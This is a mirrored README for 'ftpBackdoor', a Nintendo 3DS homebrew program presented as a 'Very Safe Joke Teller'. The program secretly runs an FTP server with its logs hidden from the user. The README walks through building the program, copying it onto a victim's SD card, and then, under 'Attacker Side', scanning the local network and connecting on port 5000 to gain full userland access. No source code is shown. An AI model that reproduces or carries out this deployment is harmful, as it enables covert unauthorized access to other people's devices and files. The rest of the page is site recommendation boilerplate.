GithubHelp home page GithubHelp logo

ftpbackdoor's Introduction

ftpBackdoor

A joke teller application that embeds an FTP server in the background.

Features

  • Sets up FTP server when the application launches
  • No logs from the FTP server are shown to the user
  • Very funny jokes.

Build and install

  1. Setting up development environment(If you only want to run the application, skip to "Install the Malware" steps)

  2. Follow these instructions to set up development environment on your computer.

  3. Open command window(or terminal) on your computer.

  4. Download the newest “ctrulib” library from github. > git clone https://github.com/smealum/ctrulib.git

  5. Copy the “libctru” folder from ctrulib and place it in /opt/devkitpro (replace the previous version of libctru)

  6. Install libctru library > cd libctru/

> make clean

> make && make install
  1. Install the Malware(If you already have the executables of the application, skip step 2-1 and 2-2)

  2. Download our malware from github > git clone https://github.com/ChengshiZhang/ftpMalware

  3. Compile the software > cd ftpMalware/

> source ~/.bashrc

> make
  1. Insert your Nintendo 3DS’ SD card and navigate to /3ds

  2. Create a folder in /3ds called “ftpMalware”

  3. Copy the executables of the malware “ftpMalware.3dsx” and “ftpMalware.smdh” and place them in /3ds/ftpMalware/ in your SD card.

  4. Eject the SD card and insert it into your Nintendo 3DS.

  5. Launch homebrew(Default setting: Hold L camera button, press power button, then release the L camera button when the top screen shows TV static white noise)

  6. Open the “Very Safe Joke Teller” application

  7. Attacker Side

  8. Connect to the same network as the user’s Nintendo 3DS.

  9. Use IP scanner(or other IP scanning softwares) to scan the local area network.

  10. Find “Nintendo Entertainment Device” on the list of scanned devices.

  11. Scan whether port 5000 is open on this IP address.

  12. Input the IP address of the 3DS and port 5000 in Filezilla(or other FTP client softwares)

  13. Wait until the FTP connection is established.

  14. Attackers now have full userland access

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.